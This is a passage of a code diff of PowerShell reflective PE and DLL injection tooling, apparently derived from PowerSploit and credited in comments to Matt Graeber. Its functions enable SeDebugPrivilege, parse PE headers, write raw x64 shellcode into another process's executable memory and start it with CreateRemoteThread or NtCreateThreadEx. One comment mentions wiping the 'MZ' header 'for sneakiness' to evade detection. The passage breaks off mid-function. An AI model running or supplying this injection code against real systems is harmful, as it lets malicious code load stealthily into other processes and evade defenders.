-	#Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/
-	Function Get-ProcAddress
-	{
-	    Param
-	    (
-	        [OutputType([IntPtr])]
-	    
-	        [Parameter( Position = 0, Mandatory = $True )]
-	        [String]
-	        $Module,
-	        
-	        [Parameter( Position = 1, Mandatory = $True )]
-	        [String]
-	        $Procedure
-	    )
-
-	    # Get a reference to System.dll in the GAC
-	    $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
-	        Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
-	    $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
-	    # Get a reference to the GetModuleHandle and GetProcAddress methods
-	    $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
-	    $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
-	    # Get a handle to the module specified
-	    $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
-	    $tmpPtr = New-Object IntPtr
-	    $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
-
-	    # Return the address of the function
-	    Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
-	}
-	
-	
-	Function Enable-SeDebugPrivilege
-	{
-		Param(
-		[Parameter(Position = 1, Mandatory = $true)]
-		[System.Object]
-		$Win32Functions,
-		
-		[Parameter(Position = 2, Mandatory = $true)]
-		[System.Object]
-		$Win32Types,
-		
-		[Parameter(Position = 3, Mandatory = $true)]
-		[System.Object]
-		$Win32Constants
-		)
-		
-		[IntPtr]$ThreadHandle = $Win32Functions.GetCurrentThread.Invoke()
-		if ($ThreadHandle -eq [IntPtr]::Zero)
-		{
-			Throw "Unable to get the handle to the current thread"
-		}
-		
-		[IntPtr]$ThreadToken = [IntPtr]::Zero
-		[Bool]$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)
-		if ($Result -eq $false)
-		{
-			$ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
-			if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN)
-			{
-				$Result = $Win32Functions.ImpersonateSelf.Invoke(3)
-				if ($Result -eq $false)
-				{
-					Throw "Unable to impersonate self"
-				}
-				
-				$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)
-				if ($Result -eq $false)
-				{
-					Throw "Unable to OpenThreadToken."
-				}
-			}
-			else
-			{
-				Throw "Unable to OpenThreadToken. Error code: $ErrorCode"
-			}
-		}
-		
-		[IntPtr]$PLuid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.LUID))
-		$Result = $Win32Functions.LookupPrivilegeValue.Invoke($null, "SeDebugPrivilege", $PLuid)
-		if ($Result -eq $false)
-		{
-			Throw "Unable to call LookupPrivilegeValue"
-		}
-
-		[UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.TOKEN_PRIVILEGES)
-		[IntPtr]$TokenPrivilegesMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize)
-		$TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesMem, [Type]$Win32Types.TOKEN_PRIVILEGES)
-		$TokenPrivileges.PrivilegeCount = 1
-		$TokenPrivileges.Privileges.Luid = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PLuid, [Type]$Win32Types.LUID)
-		$TokenPrivileges.Privileges.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED
-		[System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenPrivileges, $TokenPrivilegesMem, $true)
-
-		$Result = $Win32Functions.AdjustTokenPrivileges.Invoke($ThreadToken, $false, $TokenPrivilegesMem, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero)
-		$ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() #Need this to get success value or failure value
-		if (($Result -eq $false) -or ($ErrorCode -ne 0))
-		{
-			#Throw "Unable to call AdjustTokenPrivileges. Return value: $Result, Errorcode: $ErrorCode"   #todo need to detect if already set
-		}
-		
-		[System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)
-	}
-	
-	
-	Function Create-RemoteThread
-	{
-		Param(
-		[Parameter(Position = 1, Mandatory = $true)]
-		[IntPtr]
-		$ProcessHandle,
-		
-		[Parameter(Position = 2, Mandatory = $true)]
-		[IntPtr]
-		$StartAddress,
-		
-		[Parameter(Position = 3, Mandatory = $false)]
-		[IntPtr]
-		$ArgumentPtr = [IntPtr]::Zero,
-		
-		[Parameter(Position = 4, Mandatory = $true)]
-		[System.Object]
-		$Win32Functions
-		)
-		
-		[IntPtr]$RemoteThreadHandle = [IntPtr]::Zero
-		
-		$OSVersion = [Environment]::OSVersion.Version
-		#Vista and Win7
-		if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2)))
-		{
-			#Write-Verbose "Windows Vista/7 detected, using NtCreateThreadEx. Address of thread: $StartAddress"
-			$RetVal= $Win32Functions.NtCreateThreadEx.Invoke([Ref]$RemoteThreadHandle, 0x1FFFFF, [IntPtr]::Zero, $ProcessHandle, $StartAddress, $ArgumentPtr, $false, 0, 0xffff, 0xffff, [IntPtr]::Zero)
-			$LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
-			if ($RemoteThreadHandle -eq [IntPtr]::Zero)
-			{
-				Throw "Error in NtCreateThreadEx. Return value: $RetVal. LastError: $LastError"
-			}
-		}
-		#XP/Win8
-		else
-		{
-			#Write-Verbose "Windows XP/8 detected, using CreateRemoteThread. Address of thread: $StartAddress"
-			$RemoteThreadHandle = $Win32Functions.CreateRemoteThread.Invoke($ProcessHandle, [IntPtr]::Zero, [UIntPtr][UInt64]0xFFFF, $StartAddress, $ArgumentPtr, 0, [IntPtr]::Zero)
-		}
-		
-		if ($RemoteThreadHandle -eq [IntPtr]::Zero)
-		{
-			Write-Error "Error creating remote thread, thread handle is null" -ErrorAction Stop
-		}
-		
-		return $RemoteThreadHandle
-	}
-
-	
-
-	Function Get-ImageNtHeaders
-	{
-		Param(
-		[Parameter(Position = 0, Mandatory = $true)]
-		[IntPtr]
-		$PEHandle,
-		
-		[Parameter(Position = 1, Mandatory = $true)]
-		[System.Object]
-		$Win32Types
-		)
-		
-		$NtHeadersInfo = New-Object System.Object
-		
-		#Normally would validate DOSHeader here, but we did it before this function was called and then destroyed 'MZ' for sneakiness
-		$dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.IMAGE_DOS_HEADER)
-
-		#Get IMAGE_NT_HEADERS
-		[IntPtr]$NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfanew))
-		$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $NtHeadersPtr
-		$imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS64)
-		
-		#Make sure the IMAGE_NT_HEADERS checks out. If it doesn't, the data structure is invalid. This should never happen.
-	    if ($imageNtHeaders64.Signature -ne 0x00004550)
-	    {
-	        throw "Invalid IMAGE_NT_HEADER signature."
-	    }
-		
-		if ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC')
-		{
-			$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders64
-			$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true
-		}
-		else
-		{
-			$ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS32)
-			$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders32
-			$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false
-		}
-		
-		return $NtHeadersInfo
-	}
-
-
-	#This function will get the information needed to allocated space in memory for the PE
-	Function Get-PEBasicInfo
-	{
-		Param(
-		[Parameter( Position = 0, Mandatory = $true )]
-		[Byte[]]
-		$PEBytes,
-		
-		[Parameter(Position = 1, Mandatory = $true)]
-		[System.Object]
-		$Win32Types
-		)
-		
-		$PEInfo = New-Object System.Object
-		
-		#Write the PE to memory temporarily so I can get information from it. This is not it's final resting spot.
-		[IntPtr]$UnmanagedPEBytes = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PEBytes.Length)
-		[System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $UnmanagedPEBytes, $PEBytes.Length) | Out-Null
-		
-		#Get NtHeadersInfo
-		$NtHeadersInfo = Get-ImageNtHeaders -PEHandle $UnmanagedPEBytes -Win32Types $Win32Types
-		
-		#Build a structure with the information which will be needed for allocating memory and writing the PE to memory
-		$PEInfo | Add-Member -MemberType NoteProperty -Name 'PE64Bit' -Value ($NtHeadersInfo.PE64Bit)
-		$PEInfo | Add-Member -MemberType NoteProperty -Name 'OriginalImageBase' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.ImageBase)
-		$PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)
-		$PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfHeaders' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders)
-		$PEInfo | Add-Member -MemberType NoteProperty -Name 'DllCharacteristics' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.DllCharacteristics)
-		
-		#Free the memory allocated above, this isn't where we allocate the PE to memory
-		[System.Runtime.InteropServices.Marshal]::FreeHGlobal($UnmanagedPEBytes)
-		
-		return $PEInfo
-	}
-
-
-	#PEInfo must contain the following NoteProperties:
-	#	PEHandle: An IntPtr to the address the PE is loaded to in memory
-	Function Get-PEDetailedInfo
-	{
-		Param(
-		[Parameter( Position = 0, Mandatory = $true)]
-		[IntPtr]
-		$PEHandle,
-		
-		[Parameter(Position = 1, Mandatory = $true)]
-		[System.Object]
-		$Win32Types,
-		
-		[Parameter(Position = 2, Mandatory = $true)]
-		[System.Object]
-		$Win32Constants
-		)
-		
-		if ($PEHandle -eq $null -or $PEHandle -eq [IntPtr]::Zero)
-		{
-			throw 'PEHandle is null or IntPtr.Zero'
-		}
-		
-		$PEInfo = New-Object System.Object
-		
-		#Get NtHeaders information
-		$NtHeadersInfo = Get-ImageNtHeaders -PEHandle $PEHandle -Win32Types $Win32Types
-		
-		#Build the PEInfo object
-		$PEInfo | Add-Member -MemberType NoteProperty -Name PEHandle -Value $PEHandle
-		$PEInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ($NtHeadersInfo.IMAGE_NT_HEADERS)
-		$PEInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ($NtHeadersInfo.NtHeadersPtr)
-		$PEInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value ($NtHeadersInfo.PE64Bit)
-		$PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)
-		
-		if ($PEInfo.PE64Bit -eq $true)
-		{
-			[IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64)))
-			$PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr
-		}
-		else
-		{
-			[IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32)))
-			$PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr
-		}
-		
-		if (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_DLL) -eq $Win32Constants.IMAGE_FILE_DLL)
-		{
-			$PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'DLL'
-		}
-		elseif (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) -eq $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE)
-		{
-			$PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'EXE'
-		}
-		else
-		{
-			Throw "PE file is not an EXE or DLL"
-		}
-		
-		return $PEInfo
-	}
-	
-	
-	Function Import-DllInRemoteProcess
-	{
-		Param(
-		[Parameter(Position=0, Mandatory=$true)]
-		[IntPtr]
-		$RemoteProcHandle,
-		
-		[Parameter(Position=1, Mandatory=$true)]
-		[IntPtr]
-		$ImportDllPathPtr
-		)
-		
-		$PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
-		
-		$ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)
-		$DllPathSize = [UIntPtr][UInt64]([UInt64]$ImportDllPath.Length + 1)
-		$RImportDllPathPtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
-		if ($RImportDllPathPtr -eq [IntPtr]::Zero)
-		{
-			Throw "Unable to allocate memory in the remote process"
-		}
-
-		[UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
-		$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RImportDllPathPtr, $ImportDllPathPtr, $DllPathSize, [Ref]$NumBytesWritten)
-		
-		if ($Success -eq $false)
-		{
-			Throw "Unable to write DLL path to remote process memory"
-		}
-		if ($DllPathSize -ne $NumBytesWritten)
-		{
-			Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process"
-		}
-		
-		$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
-		$LoadLibraryAAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "LoadLibraryA") #Kernel32 loaded to the same address for all processes
-		
-		[IntPtr]$DllAddress = [IntPtr]::Zero
-		#For 64bit DLL's, we can't use just CreateRemoteThread to call LoadLibrary because GetExitCodeThread will only give back a 32bit value, but we need a 64bit address
-		#	Instead, write shellcode while calls LoadLibrary and writes the result to a memory address we specify. Then read from that memory once the thread finishes.
-		if ($PEInfo.PE64Bit -eq $true)
-		{
-			#Allocate memory for the address returned by LoadLibraryA
-			$LoadLibraryARetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
-			if ($LoadLibraryARetMem -eq [IntPtr]::Zero)
-			{
-				Throw "Unable to allocate memory in the remote process for the return value of LoadLibraryA"
-			}
-			
-			
-			#Write Shellcode to the remote process which will call LoadLibraryA (Shellcode: LoadLibraryA.asm)
-			$LoadLibrarySC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)
-			$LoadLibrarySC2 = @(0x48, 0xba)
-			$LoadLibrarySC3 = @(0xff, 0xd2, 0x48, 0xba)
-			$LoadLibrarySC4 = @(0x48, 0x89, 0x02, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
-			
-			$SCLength = $LoadLibrarySC1.Length + $LoadLibrarySC2.Length + $LoadLibrarySC3.Length + $LoadLibrarySC4.Length + ($PtrSize * 3)
-			$SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
-			$SCPSMemOriginal = $SCPSMem
-			
-			Write-BytesToMemory -Bytes $LoadLibrarySC1 -MemoryAddress $SCPSMem
-			$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC1.Length)
-			[System.Runtime.InteropServices.Marshal]::StructureToPtr($RImportDllPathPtr, $SCPSMem, $false)
-			$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
-			Write-BytesToMemory -Bytes $LoadLibrarySC2 -MemoryAddress $SCPSMem
-			$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC2.Length)
-			[System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryAAddr, $SCPSMem, $false)
-			$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
-			Write-BytesToMemory -Bytes $LoadLibrarySC3 -MemoryAddress $SCPSMem
-			$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC3.Length)
-			[System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryARetMem, $SCPSMem, $false)
-			$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
-			Write-BytesToMemory -Bytes $LoadLibrarySC4 -MemoryAddress $SCPSMem
-			$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC4.Length)
-
-			
-			$RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
-			if ($RSCAddr -eq [IntPtr]::Zero)
-			{
-				Throw "Unable to allocate memory in the remote process for shellcode"
-			}
-			
-			$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
-			if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
-			{
-				Throw "Unable to write shellcode to remote process memory."
-			}
-			
-			$RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
-			$Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
-			if ($Result -ne 0)
-			{
-				Throw "Call to CreateRemoteThread to call GetProcAddress failed."
-			}
-			
-			#The shellcode writes the DLL address to memory in the remote process at address $LoadLibraryARetMem, read this memory
-			[IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
-			$Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $LoadLibraryARetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)
-			if ($Result -eq $false)
-			{
-				Throw "Call to ReadProcessMemory failed"
-			}
-			[IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])
-
-			$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $LoadLibraryARetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
-			$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
-		}
-		else
-		{
-			[IntPtr]$RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $LoadLibraryAAddr -ArgumentPtr $RImportDllPathPtr -Win32Functions $Win32Functions
-			$Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
-			if ($Result -ne 0)
-			{
-				Throw "Call to CreateRemoteThread to call GetProcAddress failed."
-			}
-			
-			[Int32]$ExitCode = 0
-			$Result = $Win32Functions.GetExitCodeThread.Invoke($RThreadHandle, [Ref]$ExitCode)
-			if (($Result -eq 0) -or ($ExitCode -eq 0))
-			{
-				Throw "Call to GetExitCodeThread failed"
-			}
-			
-			[IntPtr]$DllAddress = [IntPtr]$ExitCode
-		}
-		
-		$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RImportDllPathPtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
-		
-		return $DllAddress
-	}
-	
-	
-	Function Get-RemoteProcAddress
-	{
-		Param(
-		[Parameter(Position=0, Mandatory=$true)]
-		[IntPtr]
-		$RemoteProcHandle,
-		
-		[Parameter(Position=1, Mandatory=$true)]
-		[IntPtr]
-		$RemoteDllHandle,
-		
-		[Parameter(Position=2, Mandatory=$true)]
-		[IntPtr]
-		$FunctionNamePtr,#This can either be a ptr to a string which is the function name, or, if LoadByOrdinal is 'true' this is an ordinal number (points to nothing)
+
+    Function Test-MemoryRangeValid
+    {
+        Param(
+        [Parameter(Position = 0, Mandatory = $true)]
+        [String]
+        $DebugString,
+
+        [Parameter(Position = 1, Mandatory = $true)]
+        [System.Object]
+        $PEInfo,
+
+        [Parameter(Position = 2, Mandatory = $true)]
+        [IntPtr]
+        $StartAddress,
+
+        [Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)]
+        [IntPtr]
+        $Size
+        )
+
+        [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size))
+
+        $PEEndAddress = $PEInfo.EndAddress
+
+        if ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.PEHandle) ($StartAddress)) -eq $true)
+        {
+            Throw "Trying to write to memory smaller than allocated address range. $DebugString"
+        }
+        if ((Compare-Val1GreaterThanVal2AsUInt ($FinalEndAddress) ($PEEndAddress)) -eq $true)
+        {
+            Throw "Trying to write to memory greater than allocated address range. $DebugString"
+        }
+    }
+
+    Function Write-BytesToMemory
+    {
+        Param(
+            [Parameter(Position=0, Mandatory = $true)]
+            [Byte[]]
+            $Bytes,
+
+            [Parameter(Position=1, Mandatory = $true)]
+            [IntPtr]
+            $MemoryAddress
+        )
+
+        for ($Offset = 0; $Offset -lt $Bytes.Length; $Offset++)
+        {
+            [System.Runtime.InteropServices.Marshal]::WriteByte($MemoryAddress, $Offset, $Bytes[$Offset])
+        }
+    }
+
+    #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/
+    Function Get-DelegateType
+    {
+        Param
+        (
+            [OutputType([Type])]
+
+            [Parameter( Position = 0)]
+            [Type[]]
+            $Parameters = (New-Object Type[](0)),
+
+            [Parameter( Position = 1 )]
+            [Type]
+            $ReturnType = [Void]
+        )
+
+        $Domain = [AppDomain]::CurrentDomain
+        $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
+        $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
+        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
+        $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
+        $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
+        $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
+        $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
+        $MethodBuilder.SetImplementationFlags('Runtime, Managed')
+
+        Write-Output $TypeBuilder.CreateType()
+    }
+
+
+    #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/
+    Function Get-ProcAddress
+    {
+        Param
+        (
+            [OutputType([IntPtr])]
+
+            [Parameter( Position = 0, Mandatory = $True )]
+            [String]
+            $Module,
+
+            [Parameter( Position = 1, Mandatory = $True )]
+            [String]
+            $Procedure
+        )
+
+        # Get a reference to System.dll in the GAC
+        $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
+            Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
+        $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
+        # Get a reference to the GetModuleHandle and GetProcAddress methods
+        $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
+        $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
+        # Get a handle to the module specified
+        $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
+        $tmpPtr = New-Object IntPtr
+        $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
+
+        # Return the address of the function
+        Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
+    }
+
+    Function Enable-SeDebugPrivilege
+    {
+        Param(
+        [Parameter(Position = 1, Mandatory = $true)]
+        [System.Object]
+        $Win32Functions,
+
+        [Parameter(Position = 2, Mandatory = $true)]
+        [System.Object]
+        $Win32Types,
+
+        [Parameter(Position = 3, Mandatory = $true)]
+        [System.Object]
+        $Win32Constants
+        )
+
+        [IntPtr]$ThreadHandle = $Win32Functions.GetCurrentThread.Invoke()
+        if ($ThreadHandle -eq [IntPtr]::Zero)
+        {
+            Throw "Unable to get the handle to the current thread"
+        }
+
+        [IntPtr]$ThreadToken = [IntPtr]::Zero
+        [Bool]$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)
+        if ($Result -eq $false)
+        {
+            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
+            if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN)
+            {
+                $Result = $Win32Functions.ImpersonateSelf.Invoke(3)
+                if ($Result -eq $false)
+                {
+                    Throw "Unable to impersonate self"
+                }
+
+                $Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)
+                if ($Result -eq $false)
+                {
+                    Throw "Unable to OpenThreadToken."
+                }
+            }
+            else
+            {
+                Throw "Unable to OpenThreadToken. Error code: $ErrorCode"
+            }
+        }
+
+        [IntPtr]$PLuid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.LUID))
+        $Result = $Win32Functions.LookupPrivilegeValue.Invoke($null, "SeDebugPrivilege", $PLuid)
+        if ($Result -eq $false)
+        {
+            Throw "Unable to call LookupPrivilegeValue"
+        }
+
+        [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.TOKEN_PRIVILEGES)
+        [IntPtr]$TokenPrivilegesMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize)
+        $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesMem, [Type]$Win32Types.TOKEN_PRIVILEGES)
+        $TokenPrivileges.PrivilegeCount = 1
+        $TokenPrivileges.Privileges.Luid = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PLuid, [Type]$Win32Types.LUID)
+        $TokenPrivileges.Privileges.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED
+        [System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenPrivileges, $TokenPrivilegesMem, $true)
+
+        $Result = $Win32Functions.AdjustTokenPrivileges.Invoke($ThreadToken, $false, $TokenPrivilegesMem, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero)
+        $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() #Need this to get success value or failure value
+        if (($Result -eq $false) -or ($ErrorCode -ne 0))
+        {
+            #Throw "Unable to call AdjustTokenPrivileges. Return value: $Result, Errorcode: $ErrorCode"   #todo need to detect if already set
+        }
+
+        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)
+    }
+
+    Function Create-RemoteThread
+    {
+        Param(
+        [Parameter(Position = 1, Mandatory = $true)]
+        [IntPtr]
+        $ProcessHandle,
+
+        [Parameter(Position = 2, Mandatory = $true)]
+        [IntPtr]
+        $StartAddress,
+
+        [Parameter(Position = 3, Mandatory = $false)]
+        [IntPtr]
+        $ArgumentPtr = [IntPtr]::Zero,
+
+        [Parameter(Position = 4, Mandatory = $true)]
+        [System.Object]
+        $Win32Functions
+        )
+
+        [IntPtr]$RemoteThreadHandle = [IntPtr]::Zero
+
+        $OSVersion = [Environment]::OSVersion.Version
+        #Vista and Win7
+        if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2)))
+        {
+            #Write-Verbose "Windows Vista/7 detected, using NtCreateThreadEx. Address of thread: $StartAddress"
